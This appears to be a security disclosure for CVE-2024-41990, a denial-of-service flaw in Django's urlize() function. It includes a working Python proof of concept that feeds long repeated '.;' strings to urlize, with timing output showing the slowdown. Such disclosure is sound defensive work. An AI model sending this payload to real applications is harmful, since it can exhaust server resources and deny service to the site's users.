CVE-2024-41990: Potential denial-of-service in django.utils.html.urlize()

I reported a slow pattern in urlize using repeated `.;` characters, which would become exponentially slower the larger the string. If a user string from a POST request was read by the function, or stored into the database to be read later by urlize, that's where the biggest problems happened. This is the PoC that I used: ```py import django.utils.html from time import time print('=== django.utils.html.urlize(".;" * n) ===') for i in range(0,1000000, 40000): start = time() PAYLOAD = ".;" * i django.utils.html.urlize(PAYLOAD) print(len(PAYLOAD), "\t", time() - start) ``` ``` === django.utils.html.urlize(".;" * n) === 80000 0.517104148864746 160000 1.91546583175659 240000 4.26700210571289 320000 7.51475358009338 400000 11.7720293998718 480000 16.8458595275879 560000 23.1542763710022 640000 39.5922138690949 720000 45.6281299591064 800000 59.8330779075623 880000 74.544540643692 960000 90.4768784046173 1040000 106.528100728989 ``` ## Impact Reduced performance or Denial of Service was possible if the urlize function was used without strict limits on a large user string.